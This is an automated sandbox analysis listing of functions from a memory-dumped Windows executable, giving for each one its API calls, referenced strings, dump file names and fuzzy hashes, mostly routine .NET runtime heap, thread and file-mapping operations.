Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A2C3B9
GetCurrentProcessorNumberEx.KERNEL32(00000000,?,?,?,00000000,00000000,00000002,?,?,?,?,00A2DD18,00000002,?,00000000,00000000), ref: 00A2C3CF
GetProcessHeap.KERNEL32(?,?,?,00000000,00000000,00000002,?,?,?,?,00A2DD18,00000002,?,00000000,00000000,?), ref: 00A2C3FC
HeapAlloc.KERNEL32(03400000,00000000,00000058,?,?,?,00000000,00000000,00000002,?,?,?,?,00A2DD18,00000002,?), ref: 00A2C419
HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000002,?,?,?,?,00A2DD18,00000002,?,00000000), ref: 00A2C444
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000002,?,?,?,?,00A2DD18,00000002), ref: 00A2C485

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$Current$AllocCounterFreeNumberPerformanceProcessProcessorQueryThread
String ID:
API String ID: 579788346-0
Opcode ID: a40dbd345d74fb5f286b3e37f830468f32e3bb6fab22734dd48e7aa8fa81b753
Instruction ID: 243970bbc29983c571270bbe2270752773b422bd8cc787a76105edc11319ea86
Opcode Fuzzy Hash: a40dbd345d74fb5f286b3e37f830468f32e3bb6fab22734dd48e7aa8fa81b753
Instruction Fuzzy Hash: F8514A75A00714DFCB20DFA9D885AAEBBF4BF88310F14466AE945E7351E770E904CBA4

Function 00A00030 Relevance: 9.1, APIs: 6, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 00A00089
HeapAlloc.KERNEL32(03400000,00000000,00000FF8,00000000,?,00000000), ref: 00A000A4
GetProcessHeap.KERNEL32 ref: 00A000F6
HeapAlloc.KERNEL32(03400000,00000000,0000000C), ref: 00A0010E

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5b641b7f5e5d4d25c847e27005b2d290e5d8dc6f9661ec53b98ef166e5ec85a3
Instruction ID: ed679e4e1e5ae609a484c35e2c32dc708313dd95e460f18323dfc431dc2a9644
Opcode Fuzzy Hash: 5b641b7f5e5d4d25c847e27005b2d290e5d8dc6f9661ec53b98ef166e5ec85a3
Instruction Fuzzy Hash: D451F3717043459BE720DF29E848B1ABBE4AB95724F10826DF988DF3D1DBB6D840CB90

Function 00744A20 Relevance: 9.1, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000004,?,BBFE6088,?,00000000,?,BBFE6088,?), ref: 00744A93
DeleteCriticalSection.KERNEL32(00000020,?,BBFE6088,?,00000000,?,BBFE6088,?), ref: 00744ACC
DeleteCriticalSection.KERNEL32(-0000003C,?,BBFE6088,?,00000000,?,BBFE6088,?), ref: 00744B05
DeleteCriticalSection.KERNEL32(-0000003C,?,BBFE6088,?,00000000,?,BBFE6088,?), ref: 00744B3F
DeleteCriticalSection.KERNEL32(00000020,?,BBFE6088,?,00000000,?,BBFE6088,?), ref: 00744B79
DeleteCriticalSection.KERNEL32(00000004,?,BBFE6088,?,00000000,?,BBFE6088,?), ref: 00744BB9

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalDeleteSection
String ID:
API String ID: 166494926-0
Opcode ID: fa2ee0e52c6ce000ffc10f163681d63920710784a26d628f96435a9d2ff54c5a
Instruction ID: bd2a0d9dfd38cf6d1b04ecda35957d4296b8b651bed52aec865bd36faaa71558
Opcode Fuzzy Hash: fa2ee0e52c6ce000ffc10f163681d63920710784a26d628f96435a9d2ff54c5a
Instruction Fuzzy Hash: A251D570900249EBCB11DFA5D889BAEBBB8EF20314F014558E441D7392DB78EB49EBD0

Function 00B78A40 Relevance: 9.1, APIs: 6, Instructions: 136fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(000000FF,00000000,00000040,00000000,?,00000000,?,?,?,?,?,?,?,?,?,BBFE6088), ref: 00B78B1A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,BBFE6088,?,00000000), ref: 00B78B30
MapViewOfFileEx.KERNEL32(00000000,00000006,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,BBFE6088), ref: 00B78B61
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,BBFE6088,?,00000000), ref: 00B78B6D
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,BBFE6088,?,00000000), ref: 00B78B79
UnmapViewOfFile.KERNEL32(00000024,?,?,?,?,?,?,?,?,?,BBFE6088,?,00000000), ref: 00B78B89

Part of subcall function 00972C00: GetLastError.KERNEL32(0097DBD2,00DB62AC,00000002,?,?,0097D75E,?), ref: 00972C00

Part of subcall function 00972CA0: HeapFree.KERNEL32(00000000,00C731C4,00000002,00000002,BBFE6088), ref: 00972D72

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorFileLast$View$CloseCreateFreeHandleHeapMappingUnmap
String ID:
API String ID: 610960497-0
Opcode ID: 670df9160ede99f34276af470e6ea2f29cb41a17813f330c637b32350f2d2fb6
Instruction ID: c61492d3e0c8cd530730aa2653763fc789a4249e650c5b9b6d6da4dfa7ba73f7
Opcode Fuzzy Hash: 670df9160ede99f34276af470e6ea2f29cb41a17813f330c637b32350f2d2fb6
Instruction Fuzzy Hash: 545136B0540745EFEB20CF68C949B9ABBF0FB48714F10C659E869AB3D0D7B6A504CB90

Function 009FDDB0 Relevance: 9.1, APIs: 6, Instructions: 64memoryfileCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,009FD2D7,?,009D8D84), ref: 009FDDCC
UnmapViewOfFile.KERNEL32(?,00000000,?,?,009FD2D7,?,009D8D84), ref: 009FDDEA
CloseHandle.KERNEL32(00000000), ref: 009FDDF3
HeapFree.KERNEL32(00000000,?,00000000,?,?,009FD2D7,?,009D8D84), ref: 009FDE18
VirtualFree.KERNEL32(?,-00000001,00004000), ref: 009FDE40
VirtualFree.KERNEL32(?,00000000,00008000), ref: 009FDE4F

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Free$HeapVirtual$CloseFileHandleUnmapView
String ID:
API String ID: 3290427157-0
Opcode ID: c0ecbea06a655d0280c0093755aeb2d1db051ab17e28a7c24453e9fe5437a53c
Instruction ID: 3151a8f4eb6f327083b76cc92080c4694fbb25d2462ebd4b31de0cac7c2d91c6
Opcode Fuzzy Hash: c0ecbea06a655d0280c0093755aeb2d1db051ab17e28a7c24453e9fe5437a53c
Instruction Fuzzy Hash: C7214D30201745DFEB348F25DC84B66B7BAFB55701F148A1CE5428AAD4DBB5B809CB50

Function 00716CF0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309memorystringCOMMON

Download Yara Rule

APIs

strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00C731C4,00000002,00000000,00000001,00000003,00000000,BBFE6088), ref: 00716E0D
HeapFree.KERNEL32(00000000,00C731C4,00000002,BBFE6088), ref: 00716EED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00C731C4,00000002,DefaultDomain,0000000D,00000004,00000000,BBFE6088), ref: 00716FBD

Part of subcall function 0071F1C0: HeapFree.KERNEL32(00000000,?,80131623,?,?,00000002), ref: 0071F1FD

Part of subcall function 0097D690: HeapFree.KERNEL32(00000000,?,?,?), ref: 0097D7A8

HeapFree.KERNEL32(00000000,00C731C4,?), ref: 00717084

Strings

DefaultDomain, xrefs: 00716FA7

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$strcpy_swcscpy_s
String ID: DefaultDomain
API String ID: 1182151116-1885726810
Opcode ID: 7af9b1f43cd02d44a4ec3f689b9b50a586d7d0af10627422a33d20a706b1432e
Instruction ID: 87addb3a68a0aa038e282077f61ec36c73b9983194a02d18424389a160eca542
Opcode Fuzzy Hash: 7af9b1f43cd02d44a4ec3f689b9b50a586d7d0af10627422a33d20a706b1432e
Instruction Fuzzy Hash: E1C1AFB5E002199BDB14CF98D895BEEBBB4FF48314F184129E801B73C1DB795A84CBA0

Function 00805880 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000004,00000000), ref: 008059BA
SysFreeString.OLEAUT32(?), ref: 00805B68
SysFreeString.OLEAUT32(?), ref: 00805B7D
SysFreeString.OLEAUT32(?), ref: 00805B92

Part of subcall function 0071F1C0: HeapFree.KERNEL32(00000000,?,80131623,?,?,00000002), ref: 0071F1FD

Strings

EX_THROW_WITH_INNER Type = 0x%x HR = 0x%x, line %d, xrefs: 00805AC3

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Free$String$Heapwcscpy_s
String ID: EX_THROW_WITH_INNER Type = 0x%x HR = 0x%x, line %d
API String ID: 1642717140-1701855325
Opcode ID: aa5ba50287bcd4aec5f205d910688bc158ec23fb8e254fc360fe5ad4195e0d5d
Instruction ID: f851495338bd44b1095fc65e651bd9f52b905292982bf588bb487dd828a60137
Opcode Fuzzy Hash: aa5ba50287bcd4aec5f205d910688bc158ec23fb8e254fc360fe5ad4195e0d5d
Instruction Fuzzy Hash: FDB1B0B0900719DBDB20DF65DC8979ABBF4FF18314F104299E859E7291EB74AA80CF60

Function 00733AD0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(_CorDllMain,?,?,?), ref: 00733BD5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(__CorDllMain@12,?), ref: 00733BEA
GetModuleHandleExW.KERNEL32(00000006,00000000,?), ref: 00733C03

Strings

_CorDllMain, xrefs: 00733BCD
__CorDllMain@12, xrefs: 00733BE5

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: strcmp$HandleModule
String ID: _CorDllMain$__CorDllMain@12
API String ID: 3386726176-1519268716
Opcode ID: 2d0385e011fc6301cc76320e4d9e7d47a1e6cff4855d9852fa13c2f63fd3809d
Instruction ID: 7b495060753f247bc626a0ff95112425e1e0d306848ac25f0759bc6ccbe5bc50
Opcode Fuzzy Hash: 2d0385e011fc6301cc76320e4d9e7d47a1e6cff4855d9852fa13c2f63fd3809d
Instruction Fuzzy Hash: 96511F71A0020A9FEB24CFA9D990BAEB7F4BF44314F1844A8D945DB342D775EE15CBA0

Function 00828CB0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 134threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00828CE0
SleepEx.KERNEL32(000000FF,00000000), ref: 00828D2E

Part of subcall function 007EB550: GetStdHandle.KERNEL32(000000F4,00000000,?), ref: 007EB55C
Part of subcall function 007EB550: strlen.API-MS-WIN-CRT-STRING-L1-1-0(Fatal error. ), ref: 007EB566
Part of subcall function 007EB550: WriteFile.KERNEL32(00000000,Fatal error. ,00007FFF,?,00000000,00000000), ref: 007EB595

Strings

Fatal error. , xrefs: 00828DA3
Fatal error while logging another fatal error., xrefs: 00828CFD
Process terminated. , xrefs: 00828DA8

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CurrentFileHandleSleepThreadWritestrlen
String ID: Fatal error while logging another fatal error.$Fatal error. $Process terminated.
API String ID: 3820310217-2540833051
Opcode ID: 3a525339638dca109ef87196dae381162aede4c3a88ae994cb89a1ae4b051be7
Instruction ID: 11fc721355d404c6d7bdfa658208df411f6b4b402d452fdfa9e196e9f45a1db9
Opcode Fuzzy Hash: 3a525339638dca109ef87196dae381162aede4c3a88ae994cb89a1ae4b051be7
Instruction Fuzzy Hash: D2518C31A02258CBCF14EFA8D9557AEBBB0FF54710F14412EE815A7381DB395E05CB91

Function 008D9640 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009865E0: GetModuleFileNameW.KERNEL32(00710000,00000000), ref: 00986666
Part of subcall function 009865E0: GetLastError.KERNEL32 ref: 00986697
Part of subcall function 009865E0: SetLastError.KERNEL32(00000000,00000000), ref: 009867A1

wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 008D9794
HeapFree.KERNEL32(00000000,?), ref: 008D97D6

Part of subcall function 0097D690: HeapFree.KERNEL32(00000000,?,?,?), ref: 0097D7A8

wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,missing,000000FF), ref: 008D97AA

Strings

missing, xrefs: 008D97A1
%d.%d.%d.%d, xrefs: 008D9759

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorFreeHeapLast$FileModuleNamewcscpy_swcsncpy_s
String ID: %d.%d.%d.%d$missing
API String ID: 2568921516-199071551
Opcode ID: b73704bd546e66098225dbb5a9bed5226a73c875dc2b8bf99ec6b97108e94efe
Instruction ID: 8b68cf872fea8559d8e70ce85d67c47061e73181de7be8f7bfc0660c2c7f4b9e
Opcode Fuzzy Hash: b73704bd546e66098225dbb5a9bed5226a73c875dc2b8bf99ec6b97108e94efe
Instruction Fuzzy Hash: 03415D71900218EBDB20DF54CD45BEEB7B8FF09314F104296E909AA390EB759A84CFA5

Function 00762DF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74threadsynchronizationCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00040000,Function_00052C50,00000000,00010000,0076330D), ref: 00762E46
SetThreadDescription.KERNELBASE ref: 00762E62
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00762E86
CloseHandle.KERNEL32(00000000), ref: 00762E9C

Strings

.NET Stack overflow create dump, xrefs: 00762E54

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Thread$CloseCreateDescriptionHandleObjectSingleWait
String ID: .NET Stack overflow create dump
API String ID: 3559772556-3933522274
Opcode ID: ad95bad8d21602d16dc875bf74258e2a4d57e8b2635acc4a37d1a46247d49509
Instruction ID: 41649bc3ab26612a3a8347d1e9631641609b4492ca0fb30002fc29f065528a6f
Opcode Fuzzy Hash: ad95bad8d21602d16dc875bf74258e2a4d57e8b2635acc4a37d1a46247d49509
Instruction Fuzzy Hash: 2421C972A046159BC711CF59DD0576EB7B8EB45B21F10032AFD21E33D0D7B559018AA1

Function 00A13EB0 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 330memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00A1420A
HeapFree.KERNEL32(00000000,?), ref: 00A14257
HeapFree.KERNEL32(00000000,?), ref: 00A14317
HeapFree.KERNEL32(00000000,?), ref: 00A14339

Strings

NULL, xrefs: 00A13F13

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 3abb41676127af9a4ed492313f22d810893131689e19e80dbf3fa391220dc472
Instruction ID: 82fb1ab31f582f464df1605961e200bf4545ef3dc7d3249e32abf30e1aa359c8
Opcode Fuzzy Hash: 3abb41676127af9a4ed492313f22d810893131689e19e80dbf3fa391220dc472
Instruction Fuzzy Hash: D3D18271A402199BDB34CF28DC51FEAB7B8AF58304F0441E9E949A7241EB71AEC5DF90

Function 00A1F480 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 325memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00A1F7CA
HeapFree.KERNEL32(00000000,?), ref: 00A1F817
HeapFree.KERNEL32(00000000,?), ref: 00A1F8CD
HeapFree.KERNEL32(00000000,?), ref: 00A1F8EF

Strings

NULL, xrefs: 00A1F4D1

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
